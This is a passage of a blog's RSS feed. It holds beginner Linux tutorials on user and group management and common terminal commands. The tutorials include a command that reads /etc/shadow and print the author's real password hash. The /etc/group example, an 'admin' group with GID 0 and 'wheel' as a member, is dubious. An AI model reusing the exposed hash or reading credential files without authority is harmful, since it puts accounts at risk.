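Because the walk records the last next hop it passed, the deepest (longest) matching prefix automatically wins, which is the behavior described throughout this post.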
<h1 id="heading-conclusion">Conclusion</h1>
<p>The longest prefix rule is an essential part of IP networking, and it is one of the key reasons why the Internet is able to work so well.</p>
<p>Overall, LPM is a powerful and efficient routing algorithm that offers a number of benefits. However, it is important to be aware of the behavior of LPM and take steps to mitigate any undesirable behavior.</p>
]]></content:encoded></item><item><title><![CDATA[Linux User management]]></title><description><![CDATA[What is a Linux user account?
A user account is a set of credentials that allow a user to log in to a Linux system and access its resources. Each user account has a unique username and password, as well as a set of permissions that determine what fil...]]></description><link>https://chinhnd.org/linux-user-management</link><guid isPermaLink="true">https://chinhnd.org/linux-user-management</guid><category><![CDATA[Linux]]></category><category><![CDATA[linux for beginners]]></category><category><![CDATA[linux-basics]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 05 Oct 2023 06:57:16 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/kuJkUTxR0z4/upload/4f6dc9fc31c05b5d3ea8f45301901926.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-a-linux-user-account"><strong>What is a Linux user account?</strong></h1>
<p>A user account is a set of credentials that allow a user to log in to a Linux system and access its resources. Each user account has a unique username and password, as well as a set of permissions that determine what files and directories the user can access and modify.</p>
<h1 id="heading-why-is-user-management-important"><strong>Why is user management important?</strong></h1>
<p>User management is important for several reasons:</p>
<ul>
<li><p><strong>Security:</strong> It helps to protect the system from unauthorized access and malicious activity.</p>
</li>
<li><p><strong>Resource management:</strong> It allows system administrators to control how resources are allocated to users.</p>
</li>
<li><p><strong>Collaboration:</strong> It facilitates collaboration between users by allowing them to share files and directories.</p>
</li>
</ul>
<h1 id="heading-types-of-users">Types of users</h1>
<p>There are three main types of users in Linux:</p>
<ul>
<li><p><strong>Root:</strong> The root user is the superuser, with full administrative privileges over the system.</p>
</li>
<li><p><strong>Regular users:</strong> Regular users have limited access to the system, but can gain administrative privileges by using the sudo command.</p>
</li>
<li><p><strong>Service users:</strong> Service users are used by system services to run in the background. They typically have limited access to the system and cannot log in directly.</p>
</li>
</ul>
<h2 id="heading-root-user"><strong>Root user</strong></h2>
<p>The root user is the most powerful user on a Linux system. It has full access to all files and directories and can run any command. The root user is typically used for system administration tasks, such as installing and configuring software, managing users and groups, and troubleshooting problems.</p>
<h2 id="heading-regular-users"><strong>Regular users</strong></h2>
<p>Regular users are used by everyday users to access the system. They have limited access to files and directories, and cannot run certain commands that could damage the system. Regular users can gain administrative privileges by using the sudo command. The sudo command allows regular users to run commands as the root user.</p>
<h2 id="heading-service-users"><strong>Service users</strong></h2>
<p>Service users are used by system services to run in the background. System services are programs that provide essential functionality for the system, such as networking, file sharing, and printing. Service users typically have limited access to the system and cannot log in directly.</p>
<h1 id="heading-how-to-create-delete-and-change-users-password">How to create, delete, and change users password</h1>
<p><strong>To change your own password</strong>, type the following command:</p>
<pre><code class="lang-bash">passwd
</code></pre>
<p>You will be prompted to enter your current password and then your new password twice.</p>
<p><strong>To change the password of another user,</strong> replace <code>&lt;username&gt;</code> with the name of the user whose password you want to change:</p>
<pre><code class="lang-bash">sudo passwd &lt;username&gt;
</code></pre>
<p><strong>To create a new user account,</strong> use <code>adduser</code> and replace <code>&lt;username&gt;</code> with the name of the new user account:</p>
<pre><code class="lang-bash">sudo adduser &lt;username&gt;
</code></pre>
<p>You will be prompted to enter additional information about the new user account, such as a full name and a password.</p>
<p><strong>To delete a user account:</strong></p>
<ol>
<li><p>Open a terminal window.</p>
</li>
<li><p>Type the following command, replacing <code>&lt;username&gt;</code> with the name of the user account you want to delete:</p>
</li>
</ol>
<pre><code class="lang-bash">sudo deluser &lt;username&gt;
</code></pre>
<p><strong>Important:</strong> Be careful when changing or resetting user passwords. If you make a mistake, you could lock yourself or other users out of the system.</p>
<h1 id="heading-user-id">User ID</h1>
<p>There are standard user ID (UID) ranges for each type of user in Linux:</p>
<ul>
<li><p><strong>Root user:</strong> UID 0</p>
</li>
<li><p><strong>Regular users:</strong> UIDs from 1000 onwards</p>
</li>
<li><p><strong>Service users:</strong> UIDs from 100 to 999</p>
</li>
</ul>
<p>You can check a user's UID using <code>cat /etc/passwd | grep &lt;username&gt;</code>:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ cat /etc/passwd | grep nguyenducchinh
nguyenducchinh:x:1000:1000:Nguyen Duc Chinh,,,:/home/nguyenducchinh:/bin/bash
nguyenducchinh@VM:~$
</code></pre>
<h1 id="heading-understand-etcpasswd-file">Understand /etc/passwd file</h1>
<p>In the above example, you can see the different fields of <code>/etc/passwd</code>, separated by a colon.</p>
<pre><code class="lang-bash">username:password:UID:GID:GECOS:home_directory:shell
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696487020896/4deff32d-d4cc-454a-87f0-bf3d3ee551ab.png" alt class="image--center mx-auto" /></p>
<p>The fields are:</p>
<ul>
<li><p><strong>Username:</strong> The string that the user types when logging in. Usernames must be unique and can be up to 32 characters long.</p>
</li>
<li><p><strong>Password:</strong> In older Linux systems, the user's encrypted password was stored in the /etc/passwd file. However, newer systems store the password in the /etc/shadow file. The password field in /etc/passwd is typically set to the character <code>x</code>.</p>
</li>
<li><p><strong>User ID (UID):</strong> A unique number assigned to each user. The UID is used by the operating system to identify the user.</p>
</li>
<li><p><strong>Group ID (GID):</strong> The primary group of the user. The primary group is the group that the user belongs to by default.</p>
</li>
<li><p><strong>GECOS (comment field):</strong> A field that can contain additional information about the user, such as their full name, office phone number, and department.</p>
</li>
<li><p><strong>Home directory:</strong> The absolute path to the user's home directory. The home directory is the directory where the user's files are stored.</p>
</li>
<li><p><strong>Shell:</strong> The absolute path to the user's default shell. The shell is the program that the user uses to interact with the operating system. You can read about the different shells in Linux <a target="_blank" href="https://blog.nguyenducchinh.com/linux-find-your-way-around-the-terminal">in this blog post.</a></p>
</li>
</ul>
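<p>Because <code>/etc/passwd</code> is plain text with colon-separated fields, you can query it with standard tools. As a small sketch (using the field positions described above), this <code>awk</code> one-liner lists regular accounts together with their UID and shell:</p>
<pre><code class="lang-bash"># Print username, UID, and login shell for regular accounts (UID 1000+),
# skipping the special "nobody" user (UID 65534 on many distributions)
awk -F: '$3 &gt;= 1000 &amp;&amp; $3 &lt; 65534 { printf "%-20s UID=%-6s %s\n", $1, $3, $7 }' /etc/passwd
</code></pre>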
<h1 id="heading-understand-etcshadow-file">Understand /etc/shadow file</h1>
<p>The <code>/etc/shadow</code> file is a critical file in Linux systems that contains encrypted passwords for all user accounts. It is owned by the root user and only readable by the root user and the shadow group. It is used by the system to authenticate users and to prevent unauthorized access.</p>
<p>Let's see what's in it:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ sudo cat /etc/shadow | grep nguyenducchinh
nguyenducchinh:$y$j9T$AESKh04Gs0cVsWhla1K1B/$Xx2PgDjaheI7VUviYM3OiT6k3loXAA2wGfhL6rzNe3.:19618:0:99999:7:::
nguyenducchinh@VM:~$
</code></pre>
<p>The <code>/etc/shadow</code> file is a text file that contains one entry per user account. Each entry is made up of nine colon-separated fields:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696488177587/ee33a692-52ee-4f05-9c12-adaed70f115e.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>Username:</strong> The name of the user account.</p>
</li>
<li><p><strong>Password hash:</strong> The one-way transformation of the user's password.</p>
</li>
<li><p><strong>Last password change:</strong> The date on which the user's password was last changed, in days since January 1, 1970.</p>
</li>
<li><p><strong>Minimum password age:</strong> The minimum number of days that a user must keep their password before they can change it.</p>
</li>
<li><p><strong>Maximum password age:</strong> The maximum number of days that a user can keep their password before they must change it.</p>
</li>
<li><p><strong>Password warning period:</strong> The number of days before the password expires on which the user starts being warned to change it.</p>
</li>
<li><p><strong>Password inactive days:</strong> The number of days after the password expires before the account is disabled.</p>
</li>
<li><p><strong>Account expiry date:</strong> The date on which the user's account will be disabled, in days since January 1, 1970.</p>
</li>
<li><p><strong>Reserved field:</strong> This field is currently unused.</p>
</li>
</ul>
<p>The password hash field is the most important field in the <code>/etc/shadow</code> file. It is used to authenticate the user when they log in.</p>
<p>The other fields in the file are used to control password aging and account lockout policies. These policies can help to prevent unauthorized access to the system by making it more difficult for attackers to guess or steal user passwords.</p>
<p>The <code>/etc/shadow</code> file is owned by the root user and typically has permissions of 640 (readable by the <code>shadow</code> group) or 600, so regular users cannot read it. This helps to protect the stored password hashes from unauthorized access.</p>
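<p>The numeric date fields in <code>/etc/shadow</code> are stored as day counts since January 1, 1970. With GNU <code>date</code> you can convert such a count back to a calendar date; for example, the <code>19618</code> ("last password change") from the entry shown earlier:</p>
<pre><code class="lang-bash"># Convert a /etc/shadow day count (days since 1970-01-01) to a date
days=19618
date -u -d "1970-01-01 +${days} days" +%Y-%m-%d   # 2023-09-18
</code></pre>
<p>In practice, <code>sudo chage -l &lt;username&gt;</code> prints the same password-aging information in a human-readable form.</p>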
<h1 id="heading-user-group">User group</h1>
<p>A user group in Linux is a collection of users who share common access privileges. Each group has a unique Group ID (GID) that is used to identify the group to the system and determine the group's permissions and privileges.</p>
<p>User groups are important because they make it easier to manage access control. By assigning users to groups, you can grant them specific permissions and privileges without having to manually configure permissions for each individual user.</p>
<h1 id="heading-how-to-create-manage-and-delete-user-groups-in-linux"><strong>How to create, manage, and delete user groups in Linux</strong></h1>
<p>To create a new user group in Linux, you can use the <code>groupadd</code> command. For example, to create a group called <code>developers</code>, you would run the following command:</p>
<pre><code class="lang-bash">sudo groupadd developers
</code></pre>
<p>To add a user to a group, you can use the <code>usermod</code> command. For example, to add the user <code>nguyenducchinh</code> to the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-bash">sudo usermod -aG developers nguyenducchinh
</code></pre>
<p>To remove a user from a group, you can use the <code>gpasswd</code> command. For example, to remove the user <code>nguyenducchinh</code> from the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-bash">sudo gpasswd -d nguyenducchinh developers
</code></pre>
<p>To delete a user group, you can use the <code>groupdel</code> command. For example, to delete the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-bash">sudo groupdel developers
</code></pre>
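<p>After changing group membership, it is worth verifying the result. The <code>id</code> and <code>getent</code> commands are handy for this (note that a user may need to log out and back in before a new group membership takes effect):</p>
<pre><code class="lang-bash"># List every group the current user belongs to
id -nG
# Show a single group's /etc/group entry (group_name:password:GID:user_list)
getent group root
</code></pre>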
<p>Here are some examples of common user groups in Linux:</p>
<ul>
<li><p><code>admin</code>: The administrator group. Users in this group have full administrative privileges.</p>
</li>
<li><p><code>root</code>: The root user group. The root user is the most powerful user on the system and has unrestricted access to all files and resources.</p>
</li>
<li><p><code>sudo</code>: The sudo group. Users in this group can run commands with root privileges.</p>
</li>
<li><p><code>developer</code>: The developer group. Users in this group typically have access to development tools and resources.</p>
</li>
<li><p><code>qa</code>: The quality assurance group. Users in this group typically have access to testing tools and resources.</p>
</li>
<li><p><code>ops</code>: The operations group. Users in this group typically have access to production systems and resources.</p>
</li>
</ul>
<p>You can also create your own custom user groups to meet your specific needs.</p>
<h1 id="heading-understand-etcgroup-file">Understand /etc/group file</h1>
<p>The <code>/etc/group</code> file is a text file that contains information about the user groups on a Linux system. Each line in the file represents a single group, and the fields are separated by a colon.</p>
<pre><code class="lang-bash">group_name:password:GID:user_list
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696489672390/d131d616-b69b-4616-8294-7b78fc9cca7a.png" alt class="image--center mx-auto" /></p>
<ul>
<li><strong>group_name:</strong> The name of the group.</li>
</ul>
<ul>
<li><p><strong>password:</strong> The group password. This is optional and is not typically used.</p>
</li>
<li><p><strong>GID:</strong> The group ID (GID). This is a unique number that identifies the group to the system.</p>
</li>
<li><p><strong>user_list:</strong> A list of users who belong to the group, separated by commas.</p>
</li>
</ul>
<p>For example, the following line in the <code>/etc/group</code> file represents the <code>admin</code> group:</p>
<pre><code class="lang-bash">admin::0:root,wheel
</code></pre>
<p>This line indicates that the <code>admin</code> group has GID 0, and that the users <code>root</code> and <code>wheel</code> are members of the group.</p>
<h1 id="heading-best-practices-for-user-management"><strong>Best practices for user management</strong></h1>
<ul>
<li><p><strong>Use strong passwords:</strong> Users should be required to use strong passwords that are difficult to guess.</p>
</li>
<li><p><strong>Limit user permissions:</strong> Users should only be given the permissions they need to perform their job duties.</p>
</li>
<li><p><strong>Regularly audit user accounts:</strong> System administrators should regularly audit user accounts to ensure that they are still necessary and that permissions are assigned appropriately.</p>
</li>
<li><p><strong>Delete unused user accounts:</strong> Unused user accounts should be deleted to reduce the attack surface of the system.</p>
</li>
</ul>
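<p>As a minimal sketch of the auditing practice above, the following one-liners flag two common review items: extra accounts with UID 0, and accounts that have an interactive login shell:</p>
<pre><code class="lang-bash"># Any account other than root with UID 0 deserves scrutiny
awk -F: '$3 == 0 &amp;&amp; $1 != "root" { print "unexpected UID 0 account:", $1 }' /etc/passwd

# Accounts whose shell ends in "sh" (bash, zsh, ...) can log in interactively
awk -F: '$7 ~ /sh$/ { print $1, $7 }' /etc/passwd
</code></pre>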
<h1 id="heading-conclusion"><strong>Conclusion</strong></h1>
<p>User management is an important part of Linux security. By understanding how it works and how to protect it, you can help to keep your system and your data safe.</p>
]]></content:encoded></item><item><title><![CDATA[Find your way around the Linux terminal]]></title><description><![CDATA[What is the Linux command line?
The Linux command line is a text-based interface that allows you to interact with the operating system. It is a lot like the DOS prompt in Windows, but it is much more powerful.
There are several different shells on Li...]]></description><link>https://chinhnd.org/find-your-way-around-the-linux-terminal</link><guid isPermaLink="true">https://chinhnd.org/find-your-way-around-the-linux-terminal</guid><category><![CDATA[Linux]]></category><category><![CDATA[linux for beginners]]></category><category><![CDATA[linux-basics]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 14 Sep 2023 09:17:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/TVxYoWzqdjs/upload/74cebf557408f11b8664f9c0ed624117.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-the-linux-command-line"><strong>What is the Linux command line?</strong></h1>
<p>The Linux command line is a text-based interface that allows you to interact with the operating system. It is a lot like the DOS prompt in Windows, but it is much more powerful.</p>
<p>There are several different shells on Linux, these are just a few popular ones:</p>
<ul>
<li><p>Bourne-again shell (Bash)</p>
</li>
<li><p>C shell (csh or tcsh, the enhanced csh)</p>
</li>
<li><p>Korn shell (ksh)</p>
</li>
<li><p>Z shell (zsh)</p>
</li>
</ul>
<p>On Linux, the most common one is the Bash shell. We will mainly focus on Bash in this series.</p>
<p>To access the Linux command line, open a terminal window. On most Linux distributions, you can do this by pressing the Ctrl+Alt+T shortcut.</p>
<p>Once you are in the terminal window, you can start typing commands.</p>
<h1 id="heading-root-and-non-root-shell">Root and non-root shell</h1>
<p>The main difference between root and non-root shells is the level of privileges they have. The root shell has full access to the system, while the non-root shell has limited access.</p>
<p>The easiest way to tell if you are in a root shell or a non-root shell is to look at the prompt. The prompt for a root shell starts with a number sign (<code>#</code>), while the prompt for a non-root shell starts with a dollar sign (<code>$</code>).</p>
<p>On Ubuntu or Debian GNU/Linux, the prompt for a regular user will likely look like this:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$
</code></pre>
<p>If you are logged in as root, your prompt will look like this:</p>
<pre><code class="lang-bash">root@VM:~<span class="hljs-comment">#</span>
</code></pre>
<p>You can also use the <code>whoami</code> command to check your current user ID.</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ whoami
nguyenducchinh
</code></pre>
<p>If you are logged in as root, the output of the <code>whoami</code> command will be <code>root</code>.</p>
<pre><code class="lang-bash">root@VM:~<span class="hljs-comment"># whoami</span>
root
</code></pre>
<p>It is important to note that the root shell can be dangerous if used incorrectly. For this reason, it is important to only use the root shell when necessary and to take precautions to avoid making mistakes.</p>
<h1 id="heading-structure-of-a-linux-command">Structure of a Linux command</h1>
<p>The structure of a Linux command is as follows:</p>
<pre><code class="lang-bash">~$ <span class="hljs-built_in">command</span> [options] [arguments]
</code></pre>
<ul>
<li><p><strong>Command:</strong> The command is the name of the program or function that you want to run.</p>
</li>
<li><p><strong>Options:</strong> Options are modifiers that can be used to change the behavior of the command.</p>
</li>
<li><p><strong>Arguments:</strong> Arguments are the data that the command needs to work.</p>
</li>
</ul>
<p>In the case below, <code>filename</code> is the argument needed to specify which file you will delete.</p>
<pre><code class="lang-bash">~$ rm filename
</code></pre>
<p>Some commands can accept multiple arguments.</p>
<pre><code class="lang-bash">~$ rm filename1 filename2 filename3
</code></pre>
<p>Here are some common options you can use with <code>rm</code>:</p>
<ul>
<li><p><strong>-i</strong> prompts system confirmation before deleting a file.</p>
</li>
<li><p><strong>-f</strong> allows the system to remove without a confirmation.</p>
</li>
<li><p><strong>-r</strong> deletes files and directories recursively.</p>
</li>
</ul>
<p>Options can be accessed in a short and a long form. For example, <code>-l</code> is identical to <code>--format=long</code> and <code>-a</code> is the same as <code>--all</code>.</p>
<p>Multiple options can be combined as well and for the short form, the letters can usually be typed together. For example, the following commands all do the same:</p>
<pre><code class="lang-bash">~$ ls -la 
~$ ls -l -a
~$ ls --format=long --all
</code></pre>
<h1 id="heading-variables">Variables</h1>
<p>In Linux shell, a variable is a named location in memory that can be used to store data. Variables can be used to store text, numbers, or other types of data.</p>
<h2 id="heading-local-variables">Local Variables</h2>
<p>To declare a local variable you use the following syntax:</p>
<pre><code class="lang-bash">~$ variable_name=value
</code></pre>
<p>For example, the following command declares a variable called <code>my_variable</code> and assigns it the value <code>123</code>:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ my_variable=123
</code></pre>
<p>Once a variable has been declared, you can use it in commands by preceding its name with a dollar sign ($). You can display any variable using the <code>echo</code> command.</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$my_variable</span>
123
</code></pre>
<p>To remove a variable, use the command <code>unset</code>:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ <span class="hljs-built_in">unset</span> my_variable
nguyenducchinh@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$my_variable</span>

nguyenducchinh@VM:~$
</code></pre>
<p>The problem is that when you open another terminal window, this variable is not accessible.</p>
<p>Local variables only work in the shell instance where they were declared. If you want to access a variable across the shell environment, you need to turn it into a global variable.</p>
<h2 id="heading-global-variables">Global Variables</h2>
<p>Turning local to global variables is done by the command <code>export</code>. When it is invoked with the variable name, this variable is added to the shell’s environment:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ greeting=hello
nguyenducchinh@VM:~$ <span class="hljs-built_in">export</span> greeting
</code></pre>
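<p>You can see the difference between a local and an exported variable by starting a child shell: a child process only inherits variables that are in its environment. A quick experiment (in a fresh shell, so that <code>greeting</code> is not already exported):</p>
<pre><code class="lang-bash">greeting=hello
bash -c 'echo "child sees: $greeting"'   # empty: local variables are not inherited
export greeting
bash -c 'echo "child sees: $greeting"'   # child sees: hello
</code></pre>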
<h2 id="heading-the-path-variable">The <code>PATH</code> Variable</h2>
<p>The <code>PATH</code> variable is a colon-separated list of directories that tells the shell where to look for executable programs. When you type a command in the shell, the shell searches the directories in the PATH variable for an executable file with the same name.</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$PATH</span>
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
nguyenducchinh@VM:~$
</code></pre>
<p>Let's say you have an executable file called <code>my_script.sh</code> in a <code>bin</code> directory under your home directory (<code>~/bin</code>). By default, the shell will not be able to find this file, because <code>~/bin</code> is not one of the directories in the PATH variable.</p>
<p>To make the shell find this file, you can add that directory to the PATH variable. You can do this by editing your shell configuration file, typically <code>~/.bashrc</code> or <code>~/.profile</code>. In the file, add the following line:</p>
<pre><code class="lang-bash">PATH=<span class="hljs-variable">$HOME</span>/bin:<span class="hljs-variable">$PATH</span>
</code></pre>
<p>This will tell the shell to look for executable files in <code>~/bin</code>, in addition to the directories that are already in the PATH variable.</p>
<p>If you don't want to edit the file, you can also set the <code>PATH</code> variable temporarily by using the <code>export</code> command.</p>
<p>Now, you can run the <code>my_script.sh</code> file by just typing the following command:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ my_script.sh
</code></pre>
<p>The shell will find the file in the home directory and execute it.</p>
<p>By setting the <code>PATH</code> variable to include the directories where your executable files are located, you can avoid having to type the full path to the file every time you want to run it.</p>
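<p>To check which file the shell will actually run for a given command name (the result of the <code>PATH</code> search), you can use <code>command -v</code> or <code>type</code>:</p>
<pre><code class="lang-bash">command -v ls   # prints the resolved path, e.g. /usr/bin/ls
type ls         # also reports aliases and shell builtins
</code></pre>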
<h1 id="heading-most-used-linux-commands"><strong>Most used Linux commands</strong></h1>
<p>Here are some of the top Linux commands frequently used by developers and system administrators:</p>
<h3 id="heading-1-ls-list-directory-contents">1. <code>ls</code> – List directory contents</h3>
<ul>
<li>Displays files and directories in the current directory.</li>
</ul>
<pre><code class="lang-bash">$ ls -l
total 32
drwxr-xr-x 2 user user 4096 Sep 22 10:00 Documents
drwxr-xr-x 3 user user 4096 Sep 21 09:00 Downloads
-rw-r--r-- 1 user user  614 Sep 22 11:00 example.txt
</code></pre>
<h3 id="heading-2-cd-change-directory">2. <code>cd</code> – Change directory</h3>
<ul>
<li>Used to navigate between directories.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">cd</span> Documents
</code></pre>
<h3 id="heading-3-pwd-print-working-directory">3. <code>pwd</code> – Print working directory</h3>
<ul>
<li>Displays the current directory you are in.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">pwd</span>
/home/user/Documents
</code></pre>
<h3 id="heading-4-cp-copy-files-or-directories">4. <code>cp</code> – Copy files or directories</h3>
<ul>
<li><p>Copies files from one location to another.</p>
</li>
<li><p>Example: <code>cp file.txt /path/to/destination</code></p>
</li>
</ul>
<pre><code class="lang-bash">$ cp example.txt backup.txt
</code></pre>
<h3 id="heading-5-mv-move-or-rename-files">5. <code>mv</code> – Move or rename files</h3>
<ul>
<li>Moves or renames files or directories.</li>
</ul>
<pre><code class="lang-bash">$ mv example.txt example_old.txt
</code></pre>
<h3 id="heading-6-rm-remove-files-or-directories">6. <code>rm</code> – Remove files or directories</h3>
<ul>
<li><p>Deletes files or directories.</p>
</li>
<li><p>Example: <code>rm file.txt</code> (use <code>rm -r</code> for directories)</p>
</li>
</ul>
<pre><code class="lang-bash">$ rm example_old.txt
</code></pre>
<h3 id="heading-7-touch-create-an-empty-file">7. <code>touch</code> – Create an empty file</h3>
<ul>
<li>Creates an empty file or updates the timestamp of an existing file.</li>
</ul>
<pre><code class="lang-bash">$ touch newfile.txt
</code></pre>
<h3 id="heading-8-mkdir-make-a-directory">8. <code>mkdir</code> – Make a directory</h3>
<ul>
<li>Creates a new directory.</li>
</ul>
<pre><code class="lang-bash">$ mkdir newfolder
</code></pre>
<h3 id="heading-9-rmdir-remove-directory">9. <code>rmdir</code> – Remove directory</h3>
<ul>
<li>Deletes an empty directory.</li>
</ul>
<pre><code class="lang-bash">$ rmdir newfolder
</code></pre>
<h3 id="heading-10-cat-concatenate-and-display-file-content">10. <code>cat</code> – Concatenate and display file content</h3>
<ul>
<li>Displays the content of a file.</li>
</ul>
<pre><code class="lang-bash">$ cat example.txt
This is an example file.
</code></pre>
<h3 id="heading-11-grep-search-text-using-patterns">11. <code>grep</code> – Search text using patterns</h3>
<ul>
<li><p>Searches for a pattern in files.</p>
</li>
<li><p>Example: <code>grep "search_text" file.txt</code></p>
</li>
</ul>
<pre><code class="lang-bash">$ grep <span class="hljs-string">"example"</span> example.txt
This is an example file.
</code></pre>
<h3 id="heading-12-find-search-for-files-or-directories">12. <code>find</code> – Search for files or directories</h3>
<ul>
<li>Searches for files based on name, type, or other attributes.</li>
</ul>
<pre><code class="lang-bash">$ find /home/user -name <span class="hljs-string">"*.txt"</span>
/home/user/Documents/example.txt
</code></pre>
<h3 id="heading-13-chmod-change-file-permissions">13. <code>chmod</code> – Change file permissions</h3>
<ul>
<li>Modifies the permissions of a file or directory.</li>
</ul>
<pre><code class="lang-bash">$ chmod 755 script.sh
</code></pre>
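<p>In a numeric mode, the three digits cover the owner, the group, and everyone else, and each digit is the sum of read (4), write (2), and execute (1). So <code>755</code> means <code>rwxr-xr-x</code>. A quick check using GNU coreutils <code>stat</code>:</p>
<pre><code class="lang-bash">touch script.sh
chmod 755 script.sh            # rwxr-xr-x
stat -c '%a %A %n' script.sh   # 755 -rwxr-xr-x script.sh
chmod 644 script.sh            # rw-r--r--
</code></pre>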
<h3 id="heading-14-chown-change-file-owner-and-group">14. <code>chown</code> – Change file owner and group</h3>
<ul>
<li>Changes the owner or group of a file.</li>
</ul>
<pre><code class="lang-bash">$ chown user:group file.txt
</code></pre>
<h3 id="heading-15-top-display-active-processes">15. <code>top</code> – Display active processes</h3>
<ul>
<li>Shows real-time system processes, CPU, and memory usage.</li>
</ul>
<pre><code class="lang-bash">$ top
</code></pre>
<p>(You’ll see an interactive display of processes.)</p>
<h3 id="heading-16-ps-report-process-status">16. <code>ps</code> – Report process status</h3>
<ul>
<li>Displays currently running processes.</li>
</ul>
<pre><code class="lang-bash">$ ps aux
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-bash">USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
user      1234  0.1  1.2 123456 12345 ?        Ssl  10:00   0:01 /usr/bin/python3
</code></pre>
<h3 id="heading-17-kill-terminate-a-process">17. <code>kill</code> – Terminate a process</h3>
<ul>
<li>Kills processes by process ID.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">kill</span> 1234
</code></pre>
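<p>By default, <code>kill</code> sends SIGTERM (signal 15), which asks the process to shut down cleanly; <code>kill -9</code> sends SIGKILL, which cannot be caught or ignored and should be a last resort. A small demonstration with a throwaway background process:</p>
<pre><code class="lang-bash">sleep 300 &amp;      # start a background process
pid=$!           # $! holds the PID of the last background job
kill "$pid"      # polite: sends SIGTERM
# kill -9 "$pid" # forceful: SIGKILL, only if SIGTERM is ignored
</code></pre>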
<h3 id="heading-18-df-disk-space-usage">18. <code>df</code> – Disk space usage</h3>
<ul>
<li>Shows available disk space on file systems.</li>
</ul>
<pre><code class="lang-bash">$ df -h
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-bash">Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       100G   60G   40G  60% /
</code></pre>
<h3 id="heading-19-du-disk-usage">19. <code>du</code> – Disk usage</h3>
<ul>
<li>Shows the size of directories and files.</li>
</ul>
<pre><code class="lang-bash">$ du -sh *
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-bash">5.0M    Documents
10M     Downloads
</code></pre>
<h3 id="heading-20-tar-archive-files">20. <code>tar</code> – Archive files</h3>
<ul>
<li>Archives and compresses files.</li>
</ul>
<pre><code class="lang-bash">$ tar -czvf archive.tar.gz /path/to/folder
</code></pre>
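<p>The flags read as create (<code>-c</code>), gzip-compress (<code>-z</code>), verbose (<code>-v</code>), and archive file name (<code>-f</code>). The same tool lists and extracts archives; here is a quick round trip using a throwaway demo directory:</p>
<pre><code class="lang-bash">mkdir -p demo &amp;&amp; echo "hello" &gt; demo/file.txt
tar -czvf archive.tar.gz demo      # create a gzip-compressed archive
tar -tzf archive.tar.gz            # list contents without extracting
tar -xzvf archive.tar.gz -C /tmp   # extract into /tmp (-x instead of -c)
</code></pre>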
<h3 id="heading-21-wget-download-files-from-the-web">21. <code>wget</code> – Download files from the web</h3>
<ul>
<li>Downloads files from a URL.</li>
</ul>
<pre><code class="lang-bash">$ wget https://example.com/file.zip
</code></pre>
<h3 id="heading-22-curl-transfer-data-from-or-to-a-server">22. <code>curl</code> – Transfer data from or to a server</h3>
<ul>
<li>Used to make network requests and download files.</li>
</ul>
<pre><code class="lang-bash">$ curl https://example.com
</code></pre>
<h3 id="heading-23-man-manual-pages-for-commands">23. <code>man</code> – Manual pages for commands</h3>
<ul>
<li>Displays the manual for a command.</li>
</ul>
<pre><code class="lang-bash">$ man ls
</code></pre>
<h3 id="heading-24-echo-display-a-line-of-text">24. <code>echo</code> – Display a line of text</h3>
<ul>
<li>Outputs text or variables.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello World"</span>
Hello World
</code></pre>
<h3 id="heading-25-sudo-execute-commands-with-superuser-privileges">25. <code>sudo</code> – Execute commands with superuser privileges</h3>
<ul>
<li>Runs commands as the root user or another user.</li>
</ul>
<pre><code class="lang-bash">$ sudo apt update
</code></pre>
<h1 id="heading-conclusion"><strong>Conclusion</strong></h1>
<p>These are just the essentials of the Linux command line that you should know. With these, you will be able to do basic file management, navigate the file system, and run programs.</p>
]]></content:encoded></item><item><title><![CDATA[Automate your terminal with Tera Term Macro]]></title><description><![CDATA[What are Tera Term and Teraterm Macro?
Tera Term is a terminal emulator software that is free and open-source. It supports Serial, TCP/IP, and named pipe connections. Tera Term Macro is a scripting language that comes with Tera Term.
